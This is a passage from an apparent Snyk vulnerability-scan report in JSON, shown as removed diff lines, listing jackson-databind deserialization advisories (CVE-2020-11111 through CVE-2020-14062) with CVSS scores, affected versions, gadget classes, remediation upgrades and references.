class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11111" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-v3xw-c963-f5hc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T09:28:18.821103Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:37Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.145935Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", - "title": "GItHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2666", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:44:29.301384Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:14.113524Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:03.656527Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:44:29.301384Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.113524Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11112" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-58pp-9c76-5625" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T09:29:29.728517Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:37Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.113524Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2682", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:54.679784Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:17.073265Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.162608Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:54.679784Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:17.073265Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.92404", - "probability": "0.04399", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11620" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-h4rc-386g-6m85" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-04-08T10:55:38.169333Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-08T00:42:23Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-04-08T00:42:23Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:17.073265Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2680", - "title": "GitHub Issues" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:17.355553Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.585105Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.933985Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:17.355553Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.585105Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.92902", - "probability": "0.05021", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11619" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-27xj-rqx5-2255" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-04-08T10:59:04.995807Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-08T00:42:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-04-08T00:42:25Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.585105Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "XuYuanzhen" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2704", - "title": "Github Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:25.351249Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.587184Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:40.439153Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:25.351249Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.587184Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", - "epssDetails": { - "percentile": "0.93100", - "probability": "0.05308", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14062" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c265-37vj-cwcc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-05-29T15:36:30.302636Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-05-01T15:36:06Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-05-29T15:36:05Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.587184Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Al1ex@knownsec" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - 